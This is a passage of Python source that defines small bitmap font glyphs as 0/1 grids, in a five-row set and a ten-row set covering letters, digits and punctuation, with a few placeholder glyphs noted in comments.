[0, 0, 1],
[1, 1, 0]]
five['K'] = [[1, 0, 0, 1],
[1, 0, 1, 0],
[1, 1, 0, 0],
[1, 0, 1, 0],
[1, 0, 0, 1]]
five['L'] = [[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 1, 1, 1]]
five['M'] = [[1, 0, 0, 0, 1],
[1, 1, 0, 1, 1],
[1, 0, 1, 0, 1],
[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1]]
five['N'] = [[1, 0, 0, 1],
[1, 1, 0, 1],
[1, 0, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1]]
five['O'] = [[0, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[0, 1, 1, 0]]
five['P'] = [[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 1, 1, 0],
[1, 0, 0, 0],
[1, 0, 0, 0]]
five['Q'] = [[0, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1]]
five['R'] = [[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 1]]
five['S'] = [[0, 1, 1, 0],
[1, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 1],
[0, 1, 1, 0]]
five['T'] = [[1, 1, 1],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0]]
five['U'] = [[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[0, 1, 1, 0]]
five['V'] = [[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[0, 1, 0, 1, 0],
[0, 0, 1, 0, 0]]
five['W'] = [[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 0, 1, 1],
[1, 0, 0, 0, 1]]
five['X'] = [[1, 0, 1],
[1, 0, 1],
[0, 1, 0],
[1, 0, 1],
[1, 0, 1]]
five['Y'] = [[1, 0, 1],
[1, 0, 1],
[0, 1, 1],
[0, 0, 1],
[1, 1, 1]]
five['Z'] = [[1, 1, 1, 1],
[0, 0, 0, 1],
[0, 1, 1, 0],
[1, 0, 0, 0],
[1, 1, 1, 1]]
five['0'] = [[1, 1, 1],
[1, 0, 1],
[1, 0, 1],
[1, 0, 1],
[1, 1, 1]]
five['1'] = [[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0]]
five['2'] = [[1, 1, 1],
[0, 0, 1],
[1, 1, 1],
[1, 0, 0],
[1, 1, 1]]
five['3'] = [[1, 1, 1],
[0, 0, 1],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]]
five['4'] = [[0, 0, 1],
[0, 1, 1],
[1, 0, 1],
[1, 1, 1],
[0, 0, 1]]
five['5'] = [[1, 1, 1],
[1, 0, 0],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]]
five['6'] = [[1, 1, 1],
[1, 0, 0],
[1, 1, 1],
[1, 0, 1],
[1, 1, 1]]
five['7'] = [[1, 1, 1],
[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[1, 0, 0]]
five['8'] = [[1, 1, 1],
[1, 0, 1],
[1, 1, 1],
[1, 0, 1],
[1, 1, 1]]
five['9'] = [[1, 1, 1],
[1, 0, 1],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]]
five['/'] = [[0, 0, 1],
[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[1, 0, 0]]
five['\\'] = [[1, 0, 0],
[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[0, 0, 1]]
five['('] = [[0, 1],
[1, 0],
[1, 0],
[1, 0],
[0, 1]]
five[')'] = [[1, 0],
[0, 1],
[0, 1],
[0, 1],
[1, 0]]
five[']'] = [[1, 1],
[0, 1],
[0, 1],
[0, 1],
[1, 1]]
five['['] = [[1, 1],
[1, 0],
[1, 0],
[1, 0],
[1, 1]]
five['{'] = [[0, 1, 1],
[0, 1, 0],
[1, 0, 0],
[0, 1, 0],
[0, 1, 1]]
five['}'] = [[1, 1, 0],
[0, 1, 0],
[0, 0, 1],
[0, 1, 0],
[1, 1, 0]]
five['>'] = [[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[0, 1, 0],
[1, 0, 0]]
five['<'] = [[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]]
five['+'] = [[0, 0, 0],
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
[0, 0, 0]]
# NOTE: '&' reuses the '+' glyph as a placeholder (no dedicated ampersand shape)
five['&'] = [[0, 0, 0],
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
[0, 0, 0]]
five['-'] = [[0, 0, 0],
[0, 0, 0],
[1, 1, 1],
[0, 0, 0],
[0, 0, 0]]
five['@'] = [[0, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 1, 1],
[1, 0, 1, 1]]
five['!'] = [[1],
[1],
[1],
[0],
[1]]
five['?'] = [[1, 1, 1],
[0, 0, 1],
[0, 1, 1],
[0, 0, 0],
[0, 1, 0]]
five['£'] = [[0, 1, 1],
[1, 0, 0],
[1, 1, 0],
[1, 0, 0],
[1, 1, 1]]
# NOTE: '$' reuses the '£' glyph as a placeholder
five['$'] = [[0, 1, 1],
[1, 0, 0],
[1, 1, 0],
[1, 0, 0],
[1, 1, 1]]
five['%'] = [[1, 0, 1],
[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[1, 0, 1]]
five['.'] = [[0],
[0],
[0],
[0],
[1]]
five[':'] = [[0],
[1],
[0],
[0],
[1]]
five[','] = [[0],
[0],
[0],
[1],
[1]]
five[';'] = [[0],
[1],
[0],
[1],
[1]]
five['='] = [[0, 0, 0],
[1, 1, 1],
[0, 0, 0],
[1, 1, 1],
[0, 0, 0]]
five['\''] = [[1],
[1],
[0],
[0],
[0]]
five['"'] = [[1, 0, 1],
[1, 0, 1],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]]
five['#'] = [[0, 1, 0, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 0, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 0, 1, 0]]
five['*'] = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
[0, 0, 0],
[0, 0, 0]]
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ten = {}
ten[' '] = [[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0]]
ten['A'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['B'] = [[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0]]
ten['C'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['D'] = [[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0]]
ten['E'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['F'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]
ten['G'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['H'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['I'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['J'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['K'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['L'] = [[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['M'] = [[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 1, 0, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 0, 1, 1, 1, 0, 1, 1],
[1, 1, 0, 0, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1]]
ten['N'] = [[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 0, 1, 1],
[1, 1, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1]]
ten['O'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['P'] = [[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]
ten['Q'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1],
[1, 1, 0, 1, 1, 0],
[1, 1, 0, 1, 1, 1],
[0, 1, 1, 0, 1, 1]]
ten['R'] = [[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['S'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['T'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0]]
ten['U'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['V'] = [[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 1, 0, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]]
ten['W'] = [[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 0, 0, 1, 1],
[1, 1, 0, 1, 1, 1, 0, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 0, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1]]
ten['X'] = [[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 1, 0, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1]]
ten['Y'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 0, 1, 1],
[0, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1]]
ten['Z'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['0'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['1'] = [[0, 0, 1, 1],
[0, 1, 1, 1],
[1, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1]]
ten['2'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['3'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1]]
ten['4'] = [[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1]]
ten['5'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['6'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['7'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]
ten['8'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['9'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['/'] = [[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0]]
ten['\\'] = [[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1]]
ten['('] = [[0, 0, 1, 1],
[1, 1, 1, 1],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 1, 1],
[0, 0, 1, 1]]
ten[')'] = [[1, 1, 0, 0],
[1, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[1, 1, 1, 1],
[1, 1, 0, 0]]
ten['['] = [[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 1, 1],
[1, 1, 1, 1]]
ten[']'] = [[1, 1, 1, 1],
[1, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]]
ten['{'] = [[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 0],
[0, 1, 1, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 1],
[0, 0, 1, 1]]
ten['}'] = [[1, 1, 0, 0],
[1, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 0],
[0, 1, 1, 0],
[1, 1, 1, 0],
[1, 1, 0, 0]]
ten['>'] = [[0, 0, 0, 0, 1, 0],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 1, 0]]
ten['<'] = [[0, 1, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 0],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0]]
ten['+'] = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]
# NOTE: '&' reuses the '+' glyph as a placeholder (no dedicated ampersand shape)
ten['&'] = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]
ten['-'] = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]
ten['@'] = [[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 1, 1, 1, 1],
[1, 1, 0, 1, 0, 1, 1],
[1, 1, 0, 1, 0, 1, 1],
[1, 1, 0, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 0, 0]]
ten['!'] = [[1, 1],
[1, 1],
[1, 1],
[1, 1],
[1, 1],
[1, 1],
[1, 1],
[0, 0],
[1, 1],
[1, 1]]
ten['?'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0]]
ten['£'] = [[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
# NOTE: '$' reuses the '£' glyph as a placeholder
ten['$'] = [[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['%'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['.'] = [[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 1],
[1, 1]]
ten[':'] = [[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 1],
[1, 1],
[0, 0],
[0, 0],
[1, 1],
[1, 1]]
ten[','] = [[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 1],
[0, 1]]
ten[';'] = [[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 1],
[1, 1],
[0, 0],
[0, 0],
[1, 1],
[0, 1]]
ten['='] = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]
ten['\''] = [[1],
[1],
[1],
[0],
[0],
[0],
[0],
[0],
[0],
[0]]
ten['"'] = [[1, 0, 1],
[1, 0, 1],
[1, 0, 1],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]]
ten['#'] = [[0, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 0, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 0, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 0, 1, 1, 0]]
ten['*'] = [[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[1, 1, 1, 1, 1],
